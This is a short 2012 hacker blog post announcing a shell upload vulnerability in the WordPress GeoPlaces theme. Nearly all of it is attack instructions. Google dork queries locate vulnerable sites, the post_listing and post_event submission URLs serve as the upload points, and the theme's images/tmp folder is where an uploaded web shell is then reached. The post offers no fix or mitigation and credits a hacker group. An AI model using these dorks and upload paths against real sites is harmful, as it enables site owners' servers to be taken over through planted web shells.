Friday 28 December 2012

0 WordPress GeoPlaces Themes | shell upload vulnerability

Posted by Panda Undetected at 14:05 
Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author     : Panda Undetected
Category   : web-apps
Contact    : panda-undetected@mail.com
Facebook   : hozni.monsterjack
Homepage   : http://4rtcode.net/
Vendor     : http://www.geotheme.com/
Date       : 14-Nopember-2012
Tested on  : anything OS
Dork       :

inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
=========================== 
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event

view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]

note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/
Home » » » WordPress GeoPlaces Themes | shell upload vulnerability

0 Comments

Bagaimana Pendapat Anda ?

Subscribe to: Post Comments (Atom)

Find Us on Facebook !


 
Copyright © 2012 [ Panda Undetected ]
Design Template Modified By 4rtcode Cyber Team